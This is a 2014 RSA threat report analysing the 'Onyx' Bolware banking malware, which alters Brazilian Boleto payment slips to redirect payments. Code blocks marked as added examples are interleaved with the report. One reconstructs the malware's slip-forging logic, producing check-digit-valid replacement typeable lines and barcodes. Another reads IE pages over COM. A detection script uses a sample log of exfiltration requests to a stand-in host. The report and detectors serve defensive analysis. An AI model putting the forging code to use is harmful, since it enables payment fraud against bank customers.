RSA Report: Bolware – Onyx Variant

BOLWARE – "ONYX" VARIANT, December 2014

RSA® Research Group


TABLE OF CONTENTS

Executive Summary
Comparison
Malware Installation, Protective Mechanisms and Persistency Techniques
Communication and Network Behavior
Barcode Replacement
Command and Control Server Infrastructure
Retrieved Data Statistics
Countermeasures
Recommended User Vigilance
Authors


EXECUTIVE SUMMARY

As mentioned in the previous report published by RSA (https://blogs.rsa.com/rsa-uncovers-boleto-fraud-ring-brazil/), Boleto malware is a fraud operation and financial threat that has appeared in recent years in Brazil. The malware family known as "Eupuds" by some AV engines has attacked thousands of victims, causing serious losses to both the banking system and its customers.

These losses are caused not only by the "Eupuds" family, but by other types of the Boleto malware as well.

This report contains information about a different family of Boleto malware, known as "Onyx". The basic idea is the same: replace Boleto information in order to redirect the payments from the victim. However, unlike "Eupuds" which injects malicious code into the different web browsers (Chrome, Firefox and Internet Explorer (IE)) memory during runtime, this kind of malware uses other mechanisms to infect the victim's machine, depending on the targeted web browser.

If the target browser is either Chrome or Firefox, the malware will be installed as an extension and will execute its JavaScript code.

On the other hand, if the target is Microsoft’s Internet Explorer®, the malware will change the Boleto information by using the COM (Component Object Model) interface with the browser.

Another difference is that the "Eupuds" family modifies the Boleto bank code, while this family does not. "Eupuds" invalidates the Boleto barcode by adding HTML comments between the black and white bar images that represent the barcode, whereas "Onyx" either downloads a full barcode image from a malicious server or tries to compose a new barcode out of black and white bars.

The altered Boleto will look like this:


Dozens of samples of this family have been found, at different levels of development. Their features vary from sample to sample and they point to different Command and Control (C&C) servers; all of them, however, use the same communication protocol with the servers, which suggests that the samples belong to a single malware codebase that is still under development.

In this report we will list the most important features of this malware family and will analyze one of the C&C servers.

Figure 1: Altered Boleto


COMPARISON

Feature              | Bolware "Ruby" (aka Eupuds)                                          | Bolware "Onyx"
---------------------|----------------------------------------------------------------------|---------------------------------------------------------------
Bank code            | Replaced                                                             | Not replaced
Typeable line        | Replaced                                                             | Replaced
Barcode              | Not replaced                                                         | Replaced (some versions put an extra one at the bottom)
Protocol             | XML obfuscated with a XOR key over HTTP                              | Plain text over HTTP
Server               | Centralized dedicated server (multiple IPs on the same server)       | Multiple servers (hacked websites)
C&C                  | PHP + MySQL                                                          | PHP + plain text storage
Dataflow affected    | On generation (on GET response) and on submission (on POST requests) | On generation (on GET response)
User credentials     | Targets Live.com                                                     | Not supported
Infection mechanism  | CreateRemoteThread() on process                                      | Chrome / Firefox: browser extension; IE: COM interface
Affected browsers    | Chrome / Firefox / IE                                                | Chrome / Firefox / IE
Affected OS          | Windows                                                              | Windows (the extension itself also works on Mac OS and Linux)

MALWARE INSTALLATION, PROTECTIVE MECHANISMS AND PERSISTENCY TECHNIQUES

The installation process depends on the targeted browser. The malware is installed as an extension and pretends to be Flash Player in Chrome and Firefox:


The same extension used as a payload by the malware can infect Linux and Mac OS, since it is written in JavaScript against the browser's API, but no malware was identified that was able to deploy this payload on other platforms.

Once properly installed in the victim's browser, the malicious extension will search and replace Boleto related information (typeable line and barcode) in order to redirect payments.

In Chrome, the manifest.json extension configuration file points to a background page called "popup.html" (with permissions to monitor tabs, all URLs, navigation and requests), which executes a JavaScript file called "popup.js". This script uses Chrome APIs to carry out the fraud:

chrome.webRequest.onCompleted.addListener(...)

Where:

• chrome.webRequest is the API to observe and analyze traffic and to intercept and modify requests in flight
• onCompleted fires when a request has been processed successfully
• addListener registers an event listener for a web request

The API takes a callback and some filters as arguments. The callback runs a JavaScript file called "getPagesSource.js", which will:

• retrieve the DOM object from the page and convert it to a string
• use regular expressions to search for Boleto information in the page opened by the browser
• retrieve the fake typeable line from the C&C server
• replace the typeable line
• calculate and replace the barcode
• send information back to the C&C server (browser, original typeable line, modified typeable line, value, due date and URL)
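The page-scanning logic described above, as an added example that is not code from the report or from the malware: the regular-expression search for a typeable line in the page source, check-digit validation of what was found, and the typeable-line-to-barcode conversion behind the "calculate and replace the barcode" step. It assumes the standard FEBRABAN Boleto layout (44-digit barcode, 47-digit typeable line with mod-10 field check digits and a mod-11 general check digit), which the report does not spell out; the sample page, bank numbers and free-field contents are constructed.

```javascript
// Added example (not from the RSA report or the Onyx extension).
// Layout assumed (standard FEBRABAN layout, an assumption of this example):
//   barcode (44 digits) = bank(3) currency(1) DV(1) dueFactor(4) value(10) freeField(25)
//   typeable line (47)  = field1(10) field2(11) field3(11) field4(1) field5(14)
//     field1 = bank + currency + freeField[0..4] + mod-10 check digit
//     field2 = freeField[5..14] + mod-10 check digit
//     field3 = freeField[15..24] + mod-10 check digit
//     field4 = barcode DV (mod 11 over the other 43 barcode digits)
//     field5 = dueFactor + value
// Every barcode digit is present in the typeable line, so once the malware
// has a new typeable line from the C&C it can derive the new barcode locally.

// Mod-10 check digit: weights 2,1,2,1,... from the right; products > 9 are digit-summed.
function mod10(digits) {
  let sum = 0;
  let weight = 2;
  for (let i = digits.length - 1; i >= 0; i--) {
    let product = Number(digits[i]) * weight;
    if (product > 9) product -= 9;
    sum += product;
    weight = weight === 2 ? 1 : 2;
  }
  return (10 - (sum % 10)) % 10;
}

// Mod-11 general check digit: weights 2..9 cycling from the right; 0, 10 and 11 map to 1.
function mod11(digits) {
  let sum = 0;
  let weight = 2;
  for (let i = digits.length - 1; i >= 0; i--) {
    sum += Number(digits[i]) * weight;
    weight = weight === 9 ? 2 : weight + 1;
  }
  const dv = 11 - (sum % 11);
  return dv === 0 || dv === 10 || dv === 11 ? 1 : dv;
}

// Assemble a 44-digit barcode from its fields, computing the general DV.
function buildBarcode(bank, currency, dueFactor, value, freeField) {
  const withoutDv = bank + currency + dueFactor + value + freeField;
  if (!/^\d{43}$/.test(withoutDv)) throw new Error("fields must total 43 digits");
  return withoutDv.slice(0, 4) + mod11(withoutDv) + withoutDv.slice(4);
}

// 47-digit typeable line from a barcode, adding the three mod-10 check digits.
function barcodeToTypeableLine(barcode) {
  const f1 = barcode.slice(0, 4) + barcode.slice(19, 24);
  const f2 = barcode.slice(24, 34);
  const f3 = barcode.slice(34, 44);
  return f1 + mod10(f1) + f2 + mod10(f2) + f3 + mod10(f3) + barcode[4] + barcode.slice(5, 19);
}

// Display form printed on Boletos: 5.5 5.6 5.6 1 14.
function formatTypeableLine(d) {
  return `${d.slice(0, 5)}.${d.slice(5, 10)} ${d.slice(10, 15)}.${d.slice(15, 21)} ` +
         `${d.slice(21, 26)}.${d.slice(26, 32)} ${d[32]} ${d.slice(33)}`;
}

// The regex-over-page-source search the extension performs; tolerates the dots
// and spaces of the display form and returns plain digit strings.
const TYPEABLE_LINE_RE = /\d{5}\.?\d{5}\s?\d{5}\.?\d{6}\s?\d{5}\.?\d{6}\s?\d\s?\d{14}/g;
function findTypeableLines(pageSource) {
  return (pageSource.match(TYPEABLE_LINE_RE) || []).map((s) => s.replace(/\D/g, ""));
}

// Rebuild the barcode from a typeable line; returns null when a check digit fails.
function typeableLineToBarcode(line) {
  const d = line.replace(/\D/g, "");
  if (d.length !== 47) return null;
  const f1 = d.slice(0, 9), f2 = d.slice(10, 20), f3 = d.slice(21, 31);
  if (mod10(f1) !== Number(d[9]) || mod10(f2) !== Number(d[20]) || mod10(f3) !== Number(d[31])) return null;
  const barcode = d.slice(0, 4) + d[32] + d.slice(33) + f1.slice(4) + f2 + f3;
  if (mod11(barcode.slice(0, 4) + barcode.slice(5)) !== Number(barcode[4])) return null;
  return barcode;
}

// Constructed sample: bank 341, currency 9, due-date factor 6187, R$ 150.00, made-up free field.
const SAMPLE_BARCODE = buildBarcode("341", "9", "6187", "0000015000", "1090000000001234500000000");
const SAMPLE_TYPEABLE_LINE = barcodeToTypeableLine(SAMPLE_BARCODE);
const SAMPLE_PAGE = `<html><body>
<p>Linha digit\u00e1vel: <b>${formatTypeableLine(SAMPLE_TYPEABLE_LINE)}</b></p>
<p>Autentica\u00e7\u00e3o mec\u00e2nica</p><img src="barcode.png">
</body></html>`;

// A crude edit of one digit without recomputing the checks is rejected...
const TAMPERED_LINE = SAMPLE_TYPEABLE_LINE.slice(0, 12) +
  ((Number(SAMPLE_TYPEABLE_LINE[12]) + 1) % 10) + SAMPLE_TYPEABLE_LINE.slice(13);
// ...but a properly generated line for another bank passes every check digit,
// which is why check digits are not a fraud control (constructed bank 237 sample).
const FRAUD_BARCODE = buildBarcode("237", "9", "6187", "0000015000", "0000000000000000000000001");
const FRAUD_TYPEABLE_LINE = barcodeToTypeableLine(FRAUD_BARCODE);

console.log(findTypeableLines(SAMPLE_PAGE), typeableLineToBarcode(SAMPLE_TYPEABLE_LINE) === SAMPLE_BARCODE);
console.log(typeableLineToBarcode(TAMPERED_LINE), typeableLineToBarcode(FRAUD_TYPEABLE_LINE) === FRAUD_BARCODE);
```

The point a defender should take from the round trip is that the typeable line alone is enough to reproduce a valid barcode, so a fraudster who generates the replacement line correctly produces a Boleto that every check digit accepts; only the bank code and payee digits give the substitution away.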

Figure 2: Fake Chrome extension

Figure 3: Fake Firefox extension


In Firefox, the process is almost the same. The "install.rdf" extension configuration file contains the information needed to install the malware as a plugin, and the file "stylebar.xul" points to a JavaScript file called "stylebar.js" that performs the same logic as "getPagesSource.js".

On the other hand, if the IE browser is running, the malware will:

• initialize the COM interface
• search for the iexplore.exe process
• retrieve a Boleto number from the server
• connect to IE and retrieve the existing page
• replace the Boleto number and barcode
• notify the C&C server of the original Boleto and the new one

Example of Delphi code that uses the COM interface to retrieve an HTML page from the browser (the snippet enumerates the shell windows, keeps those that expose IWebBrowser2, and reads the document through IHTMLDocument2):

"""
uses
  SysUtils, ShDocVw, MSHTML; // ShDocVw_TLB / MSHTML_TLB in older Delphi versions

procedure ReadIEPages;
var
  i: Integer;
  Browser: IWebBrowser2;
  ShellWindows: IShellWindows;
  Doc: IHTMLDocument2;
begin
  ShellWindows := CoShellWindows.Create;
  for i := 0 to ShellWindows.Count - 1 do
    // Explorer windows are listed too; only browser windows support IWebBrowser2
    if Supports(ShellWindows.Item(i), IWebBrowser2, Browser) then
    begin
      // do something with the Browser instance, e.g. compare the URL you're
      // expecting with Browser.LocationURL; if it matches, get at the HTML by
      // something like:
      if Supports(Browser.Document, IHTMLDocument2, Doc) and (Doc.body <> nil) then
      begin
        // access any of the Doc's properties, e.g. Doc.body.innerHTML
      end;
    end;
end;
"""

COMMUNICATION AND NETWORK BEHAVIOR

After the malware infects the browser, it starts communicating with the C&C server through HTTP messages. The first message is a notification sent by the malware to the server as soon as the malware becomes active. This is done by sending a GET to "notify.php":


After the notification is sent, a text file is created on the victim's machine in order to prevent multiple notifications for the same victim.

The subsequent messages will occur when the malware detects a Boleto operation in the browser and their purpose is to replace the Boleto information (typeable line and barcode) to redirect payments.

First, the malware will request the typeable line to replace, by sending a GET to "boleto.php?LETO":

After that, the malware sends some information about the Boleto to the server, by sending a POST to "boleto.php":

Figure 4: Notification message

Figure 5: Typeable line request

Figure 6: Transaction information


Where:

O=<original typeable line>

N=<new typeable line>

V=<value>

P=<due date>

U=<url>

Z=<browser>
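Detection logic for the exchange described in this section, as an added example that is not part of the report: it classifies HTTP requests against the request shapes above (GET to notify.php, GET to boleto.php?LETO, POST to boleto.php carrying the O/N/V/P/U/Z parameters) and against the panel pages boleto.php?123 and visualizador.php?ver that the C&C section describes, then collects the replaced typeable lines, which are the IDs a bank would blacklist. The "METHOD URL [BODY]" log format, the host names and the Boleto numbers are constructed for the example.

```javascript
// Added example (not code from the RSA report). Request shapes follow the
// report; the log line format, hosts and Boleto numbers are constructed.

const SAMPLE_LOG = [
  "GET http://hacked-site.example/img/notify.php",
  "GET http://hacked-site.example/img/boleto.php?LETO",
  "POST http://hacked-site.example/img/boleto.php " +
    "O=10499.00000+11111.111111+22222.222222+3+61870000015000" +
    "&N=23790.00000+44444.444444+55555.555555+6+61870000015000" +
    "&V=150.00&P=15/09/2014&U=https://bank.example/2via&Z=Chrome",
  "GET http://www.example.org/index.php?page=3",
  "GET http://hacked-site.example/img/boleto.php?123",
  "GET http://hacked-site.example/img/visualizador.php?ver",
];

// Parse one "METHOD URL [BODY]" line into its parts (constructed format).
function parseLogLine(line) {
  const m = /^(GET|POST)\s+(\S+)(?:\s+(.*))?$/.exec(line);
  if (!m) return null;
  return { method: m[1], url: new URL(m[2]), body: m[3] || "" };
}

const digitsOnly = (s) => (s || "").replace(/\D/g, "");

// Map one request to an Onyx rule, or null when it matches none.
function classifyRequest(req) {
  const path = req.url.pathname.toLowerCase();
  const query = req.url.searchParams; // "?LETO" and "?123" parse as bare keys
  if (req.method === "GET" && path.endsWith("/notify.php")) {
    return { rule: "onyx-victim-notification" };
  }
  if (path.endsWith("/boleto.php")) {
    if (req.method === "GET" && query.has("LETO")) return { rule: "onyx-fetch-typeable-line" };
    if (req.method === "GET" && query.has("123")) return { rule: "onyx-panel-latest-changes" };
    if (req.method === "POST") {
      const p = new URLSearchParams(req.body);
      if (p.has("O") && p.has("N")) {
        return {
          rule: "onyx-transaction-report",
          original: digitsOnly(p.get("O")),
          replaced: digitsOnly(p.get("N")),
          value: p.get("V"),
          dueDate: p.get("P"),
          pageUrl: p.get("U"),
          browser: p.get("Z"),
        };
      }
    }
  }
  if (req.method === "GET" && path.endsWith("/visualizador.php") && query.has("ver")) {
    return { rule: "onyx-panel-victims" };
  }
  return null;
}

// Scan a log and return one finding per matching line.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    const hit = req && classifyRequest(req);
    if (hit) findings.push({ host: req.url.host, line, ...hit });
  }
  return findings;
}

// Typeable lines the malware substituted: the IDs a bank would blacklist.
function replacedTypeableLines(findings) {
  return [...new Set(findings.filter((f) => f.rule === "onyx-transaction-report").map((f) => f.replaced))];
}

for (const f of scanLog(SAMPLE_LOG)) console.log(f.rule, f.host, f.replaced || "");
```

Because the protocol is plain text, the POST body gives the defender both the original and the replaced typeable line in the clear; the notification and the "?LETO" request are the earliest signals of an infected machine, before any payment is redirected.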

BARCODE REPLACEMENT

Like the "Eupuds" family, this family also replaces the Boleto barcode.

Some samples submit the modified typeable line to the malicious server in order to retrieve the corresponding barcode (as an image) and replace it in the original Boleto.

On the other hand, some of the samples simply download a fake and fixed barcode (as an image) so that the victim will be forced to use the modified typeable line to do the payment:

Figure 7: Replacement by a corresponding barcode


Some samples search for strings like "autenticacao mecanica" ("mechanical authentication" in Portuguese, the label under which the barcode is usually printed) and its variations (capital letters and accented characters) in order to locate and replace the barcode in the Boleto document.

C&C SERVER INFRASTRUCTURE

The server-side control panel is very simple and allows the botmaster to manage the botnet and review compromised data. The stolen information is publicly accessible through links on the C&C server.

The latest transaction activity (latest Boleto changes) can be retrieved by sending a GET to "boleto.php?123", which reveals the date, time, browser, original typeable line, modified typeable line, value, due date and URL:

Figure 8: Replacement by a fixed barcode

Figure 9: Latest Boleto changes


On the other hand, the latest victim information can be retrieved by sending a GET to "visualizador.php?ver", which returns a UI listing the recently infected victims (date, IP address, hostname and HTTP referrer):

The data seems to be removed from time to time, allowing only a partial view of the data on the server corresponding to a period of time.

RETRIEVED DATA STATISTICS

The data retrieved from the server reveals interesting information about this family of the "Boleto" malware and its victims.

Following are the infected browsers:

Figure 10: Latest infection information


Like the "Eupuds" variant, this family also targets the Brazilian market (citizens and companies). Most of the victims are Brazilian residents, but Brazilian citizens living abroad were infected as well. All of them are able to generate a "Boleto" online and pay it through the Brazilian online banking system.

Figure 11: Infected browsers

Figure 12: Infection by country


As shown in the map below, the malware is distributed nationwide but is concentrated in the most populated areas. The infection map looks very similar to the "Eupuds" malware distribution:

During this period the total number of victims infected by this C&C was 3,072.

The following diagram displays the daily malware activity (number of infected transactions) of one of the C&C servers during the last month (period from August 5th until September 1st):

It is important to note that these values and statistics refer to only one C&C server. A total of 50 samples and 16 C&C servers were monitored by RSA researchers during the last 2 months, so the overall malware activity involved in this fraud is likely to be far larger than the figures reported here for a single server.

COUNTERMEASURES

RSA FraudAction Service™ can help with shutting down Boleto infection points in the wild and blacklisting Boleto IDs. FraudAction provides a blacklist feed of all Boleto ID numbers altered by the Boleto malware. As fraudsters feed new Boleto IDs into the malware, the FraudAction service updates the blacklist feed. The altered fraudulent Boletos contain information that the banks can use to proactively block further payment of such Boletos, to track the account that received the fraudulent payment, and to prevent further payments to this account and cashing out.

Figure 13: Infection in Brazil

Figure 14: Activity by day


RSA® Security Analytics can help only if the Boleto malware is on employee machines and not customers.

RSA Security Analytics is designed to monitor all the communication to/from the organization to the Boleto malware C&C server, and can spot fraudulent activities by using Boleto IOCs that are in the RSA Live feed. The feed will be updated as needed, providing threat intelligence to organizations experiencing possible Boleto malware infection.

RSA LIVE feed info regarding Boleto fraud is as follows:

• Feed: RSA FirstWatch Command and Control IPs
  o Pivot: threat.desc = c2-ip-bolware
• Feed: RSA FirstWatch Command and Control Domains
  o Pivot: threat.desc = c2-domain-bolware

RSA® ECAT is engineered to help only if the Boleto malware is on employee machines and not customers.

RSA ECAT can detect the presence of Boleto malware on end user/employee devices based on the Boleto malware IOCs.

RECOMMENDED USER VIGILANCE

1. Double check the Boleto ID, using the following information that could help in detecting a fraudulent Boleto:
   • Compare the first 4 digits with previous Boletos from the same issuing company: these digits identify the destination bank, and they will usually be the same every month.
   • For a given issuing company (e.g., a credit card bill or a Boleto from the kids' school), compare the first half of the Boleto digits (usually the first 21 digits) with previous payments from the same company, since these digits identify the payee's destination account. These digits are usually the same as in the Boletos the user paid in previous months.
2. Avoid accessing websites that propose to generate new Boletos out of overdue Boletos. Check with your bank for the best process to pay an overdue Boleto.
3. Use the Authorized Direct Debit (DDA) method as much as possible in place of the traditional Boleto payment method.
4. Never trust emails that you aren't expecting, and don't click on any suspicious links.
5. Be wary of websites that request information they don't need.
6. Download and install software patches periodically from reliable sources (preferably let the software update itself).
7. Install anti-virus software from a reliable source, verify that it is enabled and update it periodically. According to Microsoft®, customers using Windows Security Essentials® are protected from this malware.
8. Scan your PC with anti-malware software on a regular basis.
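The comparison in item 1 above, as an added example that is not part of the report: it decodes a typeable line into the fields a user (or a bank-side filter) can compare with an earlier Boleto from the same issuer, and flags a change of bank code or of the first 21 digits. It assumes the standard FEBRABAN layout of the typeable line (the last 14 digits are a 4-digit due-date factor, counted in days from 1997-10-07, followed by the value in centavos), which the report does not spell out; the three sample lines are constructed.

```javascript
// Added example (not code from the RSA report). Layout assumptions:
//   typeable line (47 digits) = field1(10) field2(11) field3(11) field4(1) field5(14)
//   field5 = due-date factor(4) + value in centavos(10); factor 1000 = 2000-07-03
// FEBRABAN restarts the factor at 1000 on 2025-02-22; pass Date.UTC(2022, 4, 29)
// as factorBase for Boletos issued in that cycle.
const FACTOR_BASE = Date.UTC(1997, 9, 7);
const DAY_MS = 86400000;

// Constructed samples: last month's Boleto from an issuer, this month's legitimate
// one (same issuer, later due date) and a replaced one that keeps value and due date.
const PREVIOUS_BOLETO   = "34191.09000 00000.001234 50000.000000 1 61870000015000";
const LEGITIMATE_BOLETO = "34191.09000 00000.001234 50000.000000 1 62170000015000";
const REPLACED_BOLETO   = "23790.00000 44444.444444 55555.555555 6 62170000015000";

// Split a typeable line (with or without dots and spaces) into comparable fields.
function decodeTypeableLine(line, factorBase = FACTOR_BASE) {
  const d = line.replace(/\D/g, "");
  if (d.length !== 47) throw new Error("typeable line must have 47 digits");
  const factor = Number(d.slice(33, 37));
  const centavos = Number(d.slice(37, 47));
  return {
    bankCode: d.slice(0, 3),
    currency: d[3],
    payeeSegment: d.slice(0, 21), // the report's "first half" heuristic
    dueDate: new Date(factorBase + factor * DAY_MS).toISOString().slice(0, 10),
    value: (centavos / 100).toFixed(2),
    digits: d,
  };
}

// Compare a new Boleto with one previously paid to the same issuer.
function compareWithPrevious(previousLine, newLine) {
  const prev = decodeTypeableLine(previousLine);
  const cur = decodeTypeableLine(newLine);
  const warnings = [];
  if (prev.bankCode !== cur.bankCode) {
    warnings.push(`bank code changed: ${prev.bankCode} -> ${cur.bankCode}`);
  }
  if (prev.payeeSegment !== cur.payeeSegment) {
    warnings.push("first 21 digits differ from the previous Boleto (payee account changed)");
  }
  return { suspicious: warnings.length > 0, warnings, previous: prev, current: cur };
}

console.log(compareWithPrevious(PREVIOUS_BOLETO, LEGITIMATE_BOLETO));
console.log(compareWithPrevious(PREVIOUS_BOLETO, REPLACED_BOLETO).warnings);
```

Note that value and due date are of no use for this check: the malware reports both back to the C&C unchanged, and a replacement line that keeps them looks right to a victim who only verifies the amount.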


AUTHORS

Jonathan Zkez

James Winston

Content and liability disclaimer

This Research Paper is for general information purposes only, and should not be used as a substitute for consultation with professional advisors. EMC has exercised reasonable care in the collecting, processing, and reporting of this information but has not independently verified, validated, or audited the data to verify the accuracy or completeness of the information. EMC shall not be responsible for any errors or omissions contained on this Research Paper, and reserves the right to make changes anytime without notice. Mention of non-EMC products or services is provided for informational purposes only and constitutes neither an endorsement nor a recommendation by EMC. All EMC and third-party information provided in this Research Paper is provided on an "as is" basis.

EMC DISCLAIMS ALL WARRANTIES, EXPRESSED OR IMPLIED, WITH REGARD TO ANY INFORMATION (INCLUDING ANY SOFTWARE, PRODUCTS, OR SERVICES) PROVIDED IN THIS RESEARCH PAPER, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. Some jurisdictions do not allow the exclusion of implied warranties, so the above exclusion may not apply to you.

In no event shall EMC be liable for any damages whatsoever, and in particular EMC shall not be liable for direct, special, indirect, consequential, or incidental damages, or damages for lost profits, loss of revenue or loss of use, cost of replacement goods, loss or damage to data arising out of the use or inability to use any EMC website, any EMC product or service. This includes damages arising from use of or in reliance on the documents or information present on this Research Paper, even if EMC has been advised of the possibility of such damages


www.rsa.com

ABOUT RSA

RSA’s Intelligence Driven Security solutions help organizations reduce the risks of operating in a digital world. Through visibility, analysis, and action, RSA solutions give customers the ability to detect, investigate and respond to advanced threats; confirm and manage identities; and ultimately, prevent IP theft, fraud and cybercrime. For more information on RSA, please visit www.rsa.com.

EMC2, EMC, RSA and the RSA logo are registered trademarks or trademarks of EMC Corporation in the United States and other countries. All other trademarks used herein are the property of their respective owners. ©2014 EMC Corporation. All rights reserved. Published in the USA.

H13742